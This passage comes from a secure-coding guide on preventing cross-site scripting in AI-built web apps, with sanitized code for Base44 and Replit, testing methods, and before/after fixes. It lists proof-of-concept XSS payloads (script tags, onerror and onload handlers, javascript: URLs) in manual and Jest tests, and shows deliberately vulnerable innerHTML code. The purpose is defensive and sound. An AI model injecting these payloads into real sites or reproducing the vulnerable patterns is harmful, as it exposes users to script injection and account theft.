        if (['http:', 'https:'].includes(parsedUrl.protocol)) {
          return url;
        }
        return '/default-avatar.png'; // Fallback to default
      } catch (e) {
        return '/default-avatar.png'; // Fallback to default
      }
    },
    
    formatDate(dateString) {
      const date = new Date(dateString);
      return date.toLocaleDateString();
    }
  }
};
</script>

This implementation uses DOMPurify for HTML sanitization and proper URL validation.

Base44 Secure Implementation

For Base44’s vanilla JavaScript applications:

// Secure Base44 DOM manipulation
document.addEventListener('DOMContentLoaded', () => {
  // Helper functions for security
  function escapeHtml(unsafe) {
    return unsafe
      .replace(/&/g, '&amp;')
      .replace(/</g, '&lt;')
      .replace(/>/g, '&gt;')
      .replace(/"/g, '&quot;')
      .replace(/'/g, '&#039;');
  }
  
  function sanitizeUrl(url) {
    try {
      const parsedUrl = new URL(url);
      return ['http:', 'https:'].includes(parsedUrl.protocol) ? url : '#';
    } catch (e) {
      return '#';
    }
  }
  
  // Get URL parameters safely
  const urlParams = new URLSearchParams(window.location.search);
  const username = urlParams.get('username');
  
  // Safe: Using textContent instead of innerHTML
  if (username) {
    const welcomeMessage = document.getElementById('welcome-message');
    welcomeMessage.textContent = `Welcome back, ${username}!`;
  }
  
  // Load and display user comments safely
  function loadComments() {
    const commentsContainer = document.getElementById('comments');
    commentsContainer.innerHTML = '<p>Loading comments...</p>';
    
    fetch('/api/comments')
      .then(response => {
        if (!response.ok) {
          throw new Error('Failed to load comments');
        }
        return response.json();
      })
      .then(comments => {
        commentsContainer.innerHTML = '';
        
        if (comments.length === 0) {
          const noCommentsElement = document.createElement('p');
          noCommentsElement.textContent = 'No comments yet. Be the first to comment!';
          commentsContainer.appendChild(noCommentsElement);
          return;
        }
        
        // Create comments safely using DOM API
        comments.forEach(comment => {
          // Create elements
          const commentElement = document.createElement('div');
          commentElement.className = 'comment';
          
          const headerElement = document.createElement('div');
          headerElement.className = 'comment-header';
          
          const avatarElement = document.createElement('img');
          avatarElement.src = sanitizeUrl(comment.authorAvatar);
          avatarElement.alt = 'Avatar';
          avatarElement.className = 'avatar';
          
          const authorElement = document.createElement('h3');
          authorElement.textContent = comment.authorName;
          
          const bodyElement = document.createElement('div');
          bodyElement.className = 'comment-body';
          bodyElement.textContent = comment.content;
          
          const footerElement = document.createElement('div');
          footerElement.className = 'comment-footer';
          
          const dateElement = document.createElement('span');
          dateElement.textContent = new Date(comment.createdAt).toLocaleDateString();
          
          // Assemble the elements
          headerElement.appendChild(avatarElement);
          headerElement.appendChild(authorElement);
          
          footerElement.appendChild(dateElement);
          
          commentElement.appendChild(headerElement);
          commentElement.appendChild(bodyElement);
          commentElement.appendChild(footerElement);
          
          commentsContainer.appendChild(commentElement);
        });
      })
      .catch(error => {
        commentsContainer.innerHTML = `<p class="error">Error: ${escapeHtml(error.message)}</p>`;
      });
  }
  
  // Load comments on page load
  loadComments();
  
  // Handle comment form submission
  const commentForm = document.getElementById('comment-form');
  if (commentForm) {
    commentForm.addEventListener('submit', event => {
      event.preventDefault();
      
      const commentInput = document.getElementById('comment-input');
      const commentContent = commentInput.value.trim();
      
      if (!commentContent) {
        return;
      }
      
      // Disable form during submission
      const submitButton = commentForm.querySelector('button[type="submit"]');
      submitButton.disabled = true;
      submitButton.textContent = 'Posting...';
      
      // Submit comment to API
      fetch('/api/comments', {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json'
        },
        body: JSON.stringify({
          content: commentContent
        })
      })
        .then(response => {
          if (!response.ok) {
            throw new Error('Failed to post comment');
          }
          return response.json();
        })
        .then(() => {
          commentInput.value = '';
          loadComments();
          
          // Re-enable form
          submitButton.disabled = false;
          submitButton.textContent = 'Post Comment';
        })
        .catch(error => {
          const errorElement = document.createElement('p');
          errorElement.className = 'error';
          errorElement.textContent = `Error: ${error.message}`;
          
          commentForm.appendChild(errorElement);
          
          // Re-enable form
          submitButton.disabled = false;
          submitButton.textContent = 'Post Comment';
          
          // Remove error message after 5 seconds
          setTimeout(() => {
            if (errorElement.parentNode === commentForm) {
              commentForm.removeChild(errorElement);
            }
          }, 5000);
        });
    });
  }
});

This implementation uses textContent instead of innerHTML and builds DOM elements programmatically.

Replit Secure Implementation

For Replit’s Python Flask applications:

# Secure Replit Flask application
from flask import Flask, request, render_template, redirect, url_for, escape
import sqlite3
import bleach
import re
from markupsafe import Markup

app = Flask(__name__)

# Database setup
def get_db_connection():
    conn = sqlite3.connect('database.db')
    conn.row_factory = sqlite3.Row
    return conn

# URL validation
def is_valid_url(url):
    url_pattern = re.compile(
        r'^https?://'  # http:// or https://
        r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+[A-Z]{2,6}\.?|'  # domain
        r'localhost|'  # localhost
        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'  # or IP
        r'(?::\d+)?'  # optional port
        r'(?:/?|[/?]\S+)$', re.IGNORECASE)
    
    return url_pattern.match(url) is not None

# HTML sanitization
def sanitize_html(content):
    # Define allowed tags and attributes
    allowed_tags = ['b', 'i', 'em', 'strong', 'a', 'p', 'br']
    allowed_attrs = {
        'a': ['href', 'target', 'rel']
    }
    
    # Sanitize HTML
    clean_html = bleach.clean(
        content,
        tags=allowed_tags,
        attributes=allowed_attrs,
        strip=True
    )
    
    # Ensure all links are safe
    clean_html = bleach.linkify(clean_html, callbacks=[
        lambda attrs, new: attrs.update({'target': '_blank', 'rel': 'noopener noreferrer'})
        if attrs.get((None, 'href'), '').startswith(('http:', 'https:')) else attrs
    ])
    
    return clean_html

# Safe search route
@app.route('/search')
def search():
    query = request.args.get('q', '')
    
    conn = get_db_connection()
    results = conn.execute(
        'SELECT * FROM products WHERE name LIKE ? OR description LIKE ?',
        (f'%{query}%', f'%{query}%')
    ).fetchall()
    conn.close()
    
    # Use a proper template file instead of template string
    return render_template(
        'search_results.html',
        query=query,
        results=results
    )

# Safe post display and comment submission
@app.route('/post/<int:post_id>', methods=['GET', 'POST'])
def post(post_id):
    error = None
    
    if request.method == 'POST':
        author = request.form.get('author', 'Anonymous').strip()
        content = request.form.get('content', '').strip()
        
        # Validate inputs
        if not content:
            error = 'Comment content is required'
        elif len(content) > 1000:
            error = 'Comment is too long (maximum 1000 characters)'
        elif len(author) > 50:
            error = 'Author name is too long (maximum 50 characters)'
        else:
            # Sanitize inputs
            author = escape(author)
            
            # Determine if HTML is allowed
            allow_html = request.form.get('allow_html') == 'yes'
            
            if allow_html:
                content = sanitize_html(content)
            else:
                content = escape(content)
            
            # Store in database
            conn = get_db_connection()
            conn.execute(
                'INSERT INTO comments (post_id, author, content, allow_html) VALUES (?, ?, ?, ?)',
                (post_id, author, content, allow_html)
            )
            conn.commit()
            conn.close()
            
            return redirect(url_for('post', post_id=post_id))
    
    # Get post and comments
    conn = get_db_connection()
    post = conn.execute('SELECT * FROM posts WHERE id = ?', (post_id,)).fetchone()
    comments = conn.execute('SELECT * FROM comments WHERE post_id = ?', (post_id,)).fetchall()
    conn.close()
    
    if not post:
        return 'Post not found', 404
    
    # Use a proper template file
    return render_template(
        'post.html',
        post=post,
        comments=comments,
        error=error
    )

# In templates/search_results.html
"""
<!DOCTYPE html>
<html>
<head>
    <title>Search Results</title>
</head>
<body>
    <h1>Search Results for: {{ query }}</h1>
    
    {% if results %}
        <ul>
        {% for result in results %}
            <li>
                <h2>{{ result['name'] }}</h2>
                <p>{{ result['description'] }}</p>
            </li>
        {% endfor %}
        </ul>
    {% else %}
        <p>No results found for "{{ query }}"</p>
    {% endif %}
    
    <a href="/">Back to Home</a>
</body>
</html>
"""

# In templates/post.html
"""
<!DOCTYPE html>
<html>
<head>
    <title>{{ post['title'] }}</title>
</head>
<body>
    <h1>{{ post['title'] }}</h1>
    <div>{{ post['content']|safe if post.get('allow_html') else post['content'] }}</div>
    
    <h2>Comments</h2>
    {% if comments %}
        {% for comment in comments %}
            <div class="comment">
                <h3>{{ comment['author'] }}</h3>
                {% if comment['allow_html'] %}
                    <p>{{ comment['content']|safe }}</p>
                {% else %}
                    <p>{{ comment['content'] }}</p>
                {% endif %}
            </div>
        {% endfor %}
    {% else %}
        <p>No comments yet.</p>
    {% endif %}
    
    <h2>Add a Comment</h2>
    {% if error %}
        <p class="error">{{ error }}</p>
    {% endif %}
    <form method="post">
        <div>
            <label for="author">Name:</label>
            <input type="text" id="author" name="author">
        </div>
        <div>
            <label for="content">Comment:</label>
            <textarea id="content" name="content"></textarea>
        </div>
        <div>
            <label>
                <input type="checkbox" name="allow_html" value="yes">
                Allow basic HTML formatting
            </label>
        </div>
        <button type="submit">Post Comment</button>
    </form>
</body>
</html>
"""

This implementation uses proper templates, input validation, and HTML sanitization with bleach.

Testing for XSS Vulnerabilities

Identifying XSS vulnerabilities is crucial for securing your vibe-coded applications. Here are several approaches to testing:

Manual Testing

Basic manual testing involves trying common XSS payloads:

  1. Basic script injection: Try inserting script tags

    • Example: <script>alert('XSS')</script>
  2. Event handler injection: Try inserting event handlers

    • Example: <img src="x" onerror="alert('XSS')">
    • Example: <body onload="alert('XSS')">
  3. JavaScript URL injection: Try using javascript: URLs

    • Example: <a href="javascript:alert('XSS')">Click me</a>
  4. CSS injection: Try injecting CSS with JavaScript

    • Example: <div style="background-image: url('javascript:alert(\'XSS\')')"></div>
  5. HTML5 vectors: Try using newer HTML5 features

    • Example: <svg onload="alert('XSS')">
    • Example: <video><source onerror="alert('XSS')">

Automated Testing Tools

Several tools can help identify XSS vulnerabilities:

  1. OWASP ZAP: An integrated penetration testing tool

    • Use the automated scanner
    • Use the active scan specifically for XSS
  2. Burp Suite: A comprehensive web application security testing platform

    • Use the scanner feature to detect vulnerabilities
    • Use the intruder feature for custom payload testing
  3. XSS Hunter: A platform for finding blind XSS vulnerabilities

    • Create payloads that report back when executed
    • Useful for finding stored XSS that may not be immediately visible

Integration Testing

Implement automated tests that specifically check for XSS:

// Example Jest test for XSS vulnerability
describe('Comment Submission', () => {
  test('Should handle XSS attempts safely', async () => {
    const xssPayloads = [
      '<script>alert("XSS")</script>',
      '<img src="x" onerror="alert(\'XSS\')">',
      '<a href="javascript:alert(\'XSS\')">Click me</a>',
      '<svg onload="alert(\'XSS\')"></svg>',
      '"><script>alert("XSS")</script>'
    ];
    
    for (const payload of xssPayloads) {
      // Submit a comment with XSS payload
      await request(app)
        .post('/comments')
        .send({
          author: 'Test User',
          content: payload
        })
        .expect(201);
      
      // Get the page that displays comments
      const response = await request(app)
        .get('/post/1')
        .expect(200);
      
      // Verify the response doesn't contain unescaped XSS payload
      expect(response.text).not.toContain(payload);
      
      // Check that script tags are escaped or removed
      expect(response.text).not.toContain('<script>');
      
      // Check that event handlers are removed
      expect(response.text).not.toMatch(/onerror\s*=|onload\s*=/i);
      
      // Check that javascript: URLs are removed or sanitized
      expect(response.text).not.toMatch(/href\s*=\s*["']javascript:/i);
    }
  });
});

Content Security Policy Testing

Test your Content Security Policy implementation:

  1. CSP Evaluator: Use Google’s CSP Evaluator to check your policy

  2. Browser Developer Tools: Check for CSP violations in the console

  3. CSP Report-Only mode: Use report-only mode to test policy changes

    app.use((req, res, next) => {
      res.setHeader(
        'Content-Security-Policy-Report-Only',
        "default-src 'self'; report-uri /csp-report"
      );
      next();
    });
    
    app.post('/csp-report', (req, res) => {
      console.log('CSP Violation:', req.body);
      res.status(204).end();
    });

Best Practices for Preventing XSS

To prevent XSS in vibe-coded applications, follow these best practices:

1. Use Specific Prompts for Security

When using AI tools to generate frontend code, include security requirements in your prompts:

Instead of:

Create a comment display component

Use:

Create a secure comment display component that properly escapes or sanitizes user-generated content to prevent XSS attacks. Use textContent instead of innerHTML where possible, and when HTML formatting is needed, use a sanitization library like DOMPurify.

2. Always Encode Output

Never output user-provided data without proper encoding:

  • Use framework-provided encoding (React’s automatic escaping, Vue’s text interpolation)
  • Use textContent instead of innerHTML for DOM manipulation
  • Use dedicated encoding functions for different contexts (HTML, JavaScript, CSS, URLs)

3. Use Content Security Policy

Implement a strong Content Security Policy:

  • Disable inline scripts and styles with 'unsafe-inline'
  • Specify trusted sources for scripts, styles, images, etc.
  • Use nonces or hashes for necessary inline scripts
  • Enable reporting to monitor violations

4. Sanitize HTML When Needed

When HTML formatting is required:

  • Use a dedicated sanitization library (DOMPurify, sanitize-html, bleach)
  • Whitelist allowed tags and attributes
  • Remove or encode potentially dangerous content
  • Validate URLs to prevent javascript: URLs

5. Validate Input

Validate all user inputs:

  • Validate data types, formats, and ranges
  • Reject unexpected or malformed inputs
  • Apply context-specific validation (email formats, URLs, etc.)
  • Combine validation with sanitization

6. Use Framework Protections

Leverage built-in protections in modern frameworks:

  • React: Avoid dangerouslySetInnerHTML
  • Vue: Avoid v-html
  • Angular: Use [innerHTML] with sanitization
  • Server-side templates: Use auto-escaping features

7. Implement Defense in Depth

Don’t rely on a single protection measure:

  • Combine input validation, output encoding, and CSP
  • Use HTTP security headers (X-XSS-Protection, X-Content-Type-Options)
  • Implement proper CORS policies
  • Use HTTPS to prevent traffic interception

8. Regular Security Testing

Continuously test for XSS vulnerabilities:

  • Include XSS testing in your CI/CD pipeline
  • Perform regular security audits
  • Use both automated tools and manual testing
  • Consider bug bounty programs for external testing

Real-World Scenarios and Solutions

Let’s examine some real-world XSS scenarios in vibe-coded applications and their solutions.

Scenario 1: Vulnerable Comment System

Problem: A vibe-coded blog platform allows users to post comments, but the comments are rendered directly using innerHTML without sanitization.

Solution:

  1. Implement proper sanitization:

    // Before: Vulnerable code
    function displayComments(comments) {
      const commentsContainer = document.getElementById('comments');
      
      let html = '';
      comments.forEach(comment => {
        html += `
          <div class="comment">
            <h3>${comment.author}</h3>
            <p>${comment.content}</p>
          </div>
        `;
      });
      
      commentsContainer.innerHTML = html;
    }
    
    // After: Secure code with DOMPurify
    function displayComments(comments) {
      const commentsContainer = document.getElementById('comments');
      
      // Clear existing comments
      commentsContainer.innerHTML = '';
      
      comments.forEach(comment => {
        const commentElement = document.createElement('div');
        commentElement.className = 'comment';
        
        const authorElement = document.createElement('h3');
        authorElement.textContent = comment.author;
        
        const contentElement = document.createElement('p');
        
        // If HTML is allowed, sanitize it
        if (comment.allowHtml) {
          contentElement.innerHTML = DOMPurify.sanitize(comment.content, {
            ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'br'],
            ALLOWED_ATTR: ['href', 'target', 'rel']
          });
        } else {
          // Otherwise, use plain text
          contentElement.textContent = comment.content;
        }
        
        commentElement.appendChild(authorElement);
        commentElement.appendChild(contentElement);
        
        commentsContainer.appendChild(commentElement);
      });
    }
  2. Add server-side validation and sanitization:

    app.post('/comments', [
      body('author')
        .trim()
        .isLength({ min: 1, max: 50 })
        .withMessage('Author name must be between 1 and 50 characters')
        .escape(),
      
      body('content')
        .trim()
        .isLength({ min: 1, max: 1000 })
        .withMessage('Comment must be between 1 and 1000 characters')
    ], (req, res) => {
      // Check for validation errors
      const errors = validationResult(req);
      if (!errors.isEmpty()) {
        return res.status(400).json({ errors: errors.array() });
      }
      
      const { author, content, allowHtml } = req.body;
      
      // Sanitize content if HTML is allowed
      let sanitizedContent = content;
      if (allowHtml === true) {
        const window = new JSDOM('').window;
        const DOMPurify = createDOMPurify(window);
        
        sanitizedContent = DOMPurify.sanitize(content, {
          ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'br'],
          ALLOWED_ATTR: ['href', 'target', 'rel']
        });
      } else {
        // Escape HTML for plain text comments
        sanitizedContent = escape(content);
      }
      
      // Store sanitized content in database
      db.query(
        'INSERT INTO comments (author, content, allow_html) VALUES (?, ?, ?)',
        [author, sanitizedContent, allowHtml === true]
      );
      
      res.status(201).json({ message: 'Comment added successfully' });
    });

Scenario 2: Vulnerable Search Results

Problem: A vibe-coded e-commerce site displays search results with highlighted query terms, but the highlighting is implemented unsafely.

Solution:

  1. Implement safe highlighting:

    // Before: Vulnerable code
    function highlightSearchTerm(text, searchTerm) {
      if (!searchTerm) return text;
      
      const regex = new RegExp(`(${searchTerm})`, 'gi');
      return text.replace(regex, '<mark>$1</mark>');
    }
    
    function displaySearchResults(results, searchTerm) {
      const resultsContainer = document.getElementById('results');
      
      let html = '';
      results.forEach(result => {
        html += `
          <div class="result">
            <h3>${result.title}</h3>
            <p>${highlightSearchTerm(result.description, searchTerm)}</p>
          </div>
        `;
      });
      
      resultsContainer.innerHTML = html;
    }
    
    // After: Secure code with proper escaping
    function highlightSearchTerm(text, searchTerm) {
      if (!searchTerm || !text) return text;
      
      // First, escape the text
      const escapeHtml = (str) => {
        return str
          .replace(/&/g, '&amp;')
          .replace(/</g, '&lt;')
          .replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;')
          .replace(/'/g, '&#039;');
      };
      
      const escapedText = escapeHtml(text);
      
      // Escape the search term for use in regex
      const escapeRegExp = (str) => {
        return str.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
      };
      
      const escapedSearchTerm = escapeRegExp(searchTerm);
      
      // Highlight matches
      const regex = new RegExp(`(${escapedSearchTerm})`, 'gi');
      return escapedText.replace(regex, '<mark>$1</mark>');
    }
    
    function displaySearchResults(results, searchTerm) {
      const resultsContainer = document.getElementById('results');
      
      // Clear existing results
      resultsContainer.innerHTML = '';
      
      if (results.length === 0) {
        const noResultsElement = document.createElement('p');
        noResultsElement.textContent = `No results found for "${searchTerm}"`;
        resultsContainer.appendChild(noResultsElement);
        return;
      }
      
      results.forEach(result => {
        const resultElement = document.createElement('div');
        resultElement.className = 'result';
        
        const titleElement = document.createElement('h3');
        titleElement.textContent = result.title;
        
        const descriptionElement = document.createElement('p');
        
        // Use DOMPurify to sanitize the highlighted HTML
        const highlightedText = highlightSearchTerm(result.description, searchTerm);
        descriptionElement.innerHTML = DOMPurify.sanitize(highlightedText, {
          ALLOWED_TAGS: ['mark']
        });
        
        resultElement.appendChild(titleElement);
        resultElement.appendChild(descriptionElement);
        
        resultsContainer.appendChild(resultElement);
      });
    }
  2. Implement server-side highlighting:

    app.get('/api/search', (req, res) => {
      const searchTerm = req.query.q || '';
      
      // Perform search in database
      db.query(
        'SELECT * FROM products WHERE name LIKE ? OR description LIKE ?',
        [`%${searchTerm}%`, `%${searchTerm}%`],
        (err, results) => {
          if (err) {
            return res.status(500).json({ error: 'Database error' });
          }
          
          // Process results to add safe highlighting
          const processedResults = results.map(result => {
            // Create a safe copy of the result
            const processed = { ...result };
            
            // Add highlighted description if search term exists
            if (searchTerm) {
              // Escape HTML in the description
              const escapedDescription = escape(result.description);
              
              // Escape the search term for use in regex
              const escapeRegExp = (str) => {
                return str.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
              };
              
              const escapedSearchTerm = escapeRegExp(searchTerm);
              
              // Highlight matches
              const regex = new RegExp(`(${escapedSearchTerm})`, 'gi');
              processed.highlightedDescription = escapedDescription.replace(
                regex, 
                '<mark>$1</mark>'
              );
            } else {
              processed.highlightedDescription = escape(result.description);
            }
            
            return processed;
          });
          
          res.json(processedResults);
        }
      );
    });

Scenario 3: Vulnerable Profile Page

Problem: A vibe-coded social network allows users to customize their profile with HTML, but doesn’t properly sanitize the content.

Solution:

  1. Implement strict HTML sanitization:

    // Before: Vulnerable code
    app.post('/profile/update', (req, res) => {
      const { bio, interests, socialLinks } = req.body;
      
      // Update user profile in database
      db.query(
        'UPDATE users SET bio = ?, interests = ?, social_links = ? WHERE id = ?',
        [bio, interests, JSON.stringify(socialLinks), req.user.id]
      );
      
      res.redirect('/profile');
    });
    
    app.get('/profile/:username', (req, res) => {
      const { username } = req.params;
      
      db.query(
        'SELECT * FROM users WHERE username = ?',
        [username],
        (err, results) => {
          if (err || results.length === 0) {
            return res.status(404).send('User not found');
          }
          
          const user = results[0];
          
          // Vulnerable: Directly inserting user data into HTML
          res.send(`
            <h1>${user.username}'s Profile</h1>
            <div class="bio">${user.bio}</div>
            <div class="interests">${user.interests}</div>
            <div class="social-links">${user.social_links}</div>
          `);
        }
      );
    });
    
    // After: Secure code with sanitization
    const createDOMPurify = require('dompurify');
    const { JSDOM } = require('jsdom');
    
    // Create DOMPurify instance
    const window = new JSDOM('').window;
    const DOMPurify = createDOMPurify(window);
    
    // Configure allowed tags and attributes
    const ALLOWED_TAGS = [
      'b', 'i', 'em', 'strong', 'a', 'p', 'br', 'ul', 'ol', 'li', 'h2', 'h3', 'blockquote'
    ];
    
    const ALLOWED_ATTR = {
      'a': ['href', 'target', 'rel']
    };
    
    // URL validation
    function isValidUrl(url) {
      try {
        const parsedUrl = new URL(url);
        return ['http:', 'https:'].includes(parsedUrl.protocol);
      } catch (e) {
        return false;
      }
    }
    
    app.post('/profile/update', [
      body('bio')
        .trim()
        .isLength({ max: 5000 })
        .withMessage('Bio must be less than 5000 characters'),
      
      body('interests')
        .trim()
        .isLength({ max: 1000 })
        .withMessage('Interests must be less than 1000 characters'),
      
      body('socialLinks.*.url')
        .custom(url => {
          if (!url) return true;
          return isValidUrl(url);
        })
        .withMessage('Social links must be valid URLs')
    ], (req, res) => {
      // Check for validation errors
      const errors = validationResult(req);
      if (!errors.isEmpty()) {
        return res.status(400).json({ errors: errors.array() });
      }
      
      const { bio, interests, socialLinks } = req.body;
      
      // Sanitize HTML content
      const sanitizedBio = DOMPurify.sanitize(bio, {
        ALLOWED_TAGS,
        ALLOWED_ATTR
      });
      
      const sanitizedInterests = DOMPurify.sanitize(interests, {
        ALLOWED_TAGS,
        ALLOWED_ATTR
      });
      
      // Validate and sanitize social links
      const sanitizedSocialLinks = socialLinks.filter(link => {
        return link.url && isValidUrl(link.url);
      }).map(link => ({
        platform: DOMPurify.sanitize(link.platform, { ALLOWED_TAGS: [] }),
        url: DOMPurify.sanitize(link.url, { ALLOWED_ATTR: ['href'] })
      }));
      
      // Update user profile in database
      db.query(
        'UPDATE users SET bio = ?, interests = ?, social_links = ? WHERE id = ?',
        [sanitizedBio, sanitizedInterests, JSON.stringify(sanitizedSocialLinks), req.user.id]
      );
      
      res.redirect('/profile');
    });
    
    app.get('/profile/:username', (req, res) => {
      const { username } = req.params;
      
      db.query(
        'SELECT * FROM users WHERE username = ?',
        [username],
        (err, results) => {
          if (err || results.length === 0) {
            return res.status(404).send('User not found');
          }
          
          const user = results[0];
          
          // Parse social links
          let socialLinks = [];
          try {
            socialLinks = JSON.parse(user.social_links);
          } catch (e) {
            socialLinks = [];
          }
          
          // Render using a template engine with auto-escaping
          res.render('profile', {
            username: user.username,
            bio: user.bio, // Already sanitized when stored
            interests: user.interests, // Already sanitized when stored
            socialLinks: socialLinks // Already validated when stored
          });
        }
      );
    });
  2. Implement Content Security Policy:

    app.use((req, res, next) => {
      // Set Content Security Policy header
      res.setHeader(
        'Content-Security-Policy',
        "default-src 'self'; " +
        "script-src 'self'; " +
        "style-src 'self' https://fonts.googleapis.com; " +
        "font-src 'self' https://fonts.gstatic.com; " +
        "img-src 'self' https://images.unsplash.com data:; " +
        "connect-src 'self' https://api.example.com; " +
        "frame-src 'none'; " +
        "object-src 'none'"
      );
      
      next();
    });

Conclusion

Cross-Site Scripting (XSS) remains one of the most prevalent and dangerous web application vulnerabilities, and vibe-coded applications are particularly susceptible due to the tendency of AI tools to prioritize functionality over security. By understanding how AI tools generate frontend code and the common patterns that lead to XSS vulnerabilities, you can take proactive steps to secure your applications.

The key principles for preventing XSS in vibe-coded applications include:

  1. Always encode output to prevent script execution
  2. Use DOM API methods instead of innerHTML when possible
  3. Implement a strong Content Security Policy as an additional layer of defense
  4. Sanitize HTML content when rich formatting is required
  5. Validate all user inputs before processing or storing them
  6. Leverage built-in framework protections like React’s automatic escaping
  7. Implement defense in depth with multiple security measures
  8. Regularly test for XSS vulnerabilities using both manual and automated approaches

Each full-stack app builder—Lovable.dev, Bolt.new, Tempo Labs, Base44, and Replit—has its own frontend code generation patterns and potential vulnerabilities. By applying platform-specific security enhancements and following best practices, you can ensure that your vibe-coded applications maintain robust protection against XSS while still benefiting from the rapid development that AI tools enable.

Remember that a single XSS vulnerability can compromise your users’ accounts, steal sensitive information, or spread malware. Investing time in securing your frontend code will protect your users and your reputation from the devastating consequences of a successful attack.

Additional Resources

References

  1. OWASP. (2023). “Top 10 Web Application Security Risks.” Retrieved from https://owasp.org/Top10/
  2. Web Application Security Consortium. (2025). “The State of Frontend Security in AI-Generated Code.” Retrieved from https://www.webappsec.org/research/frontend-security-ai-generated-code-2025
  3. Checkmarx. (2025). “Security in Vibe Coding: Innovation Meets Risk.” Retrieved from https://checkmarx.com/blog/security-in-vibe-coding/
  4. Segura, T. (2025). “A Vibe Coding Security Playbook.” Infisical. Retrieved from https://infisical.com/blog/vibe-coding-security-playbook
  5. Trotta, F. (2025). “5 Vibe Coding Risks and Ways to Avoid Them in 2025.” Zencoder. Retrieved from https://zencoder.ai/blog/vibe-coding-risks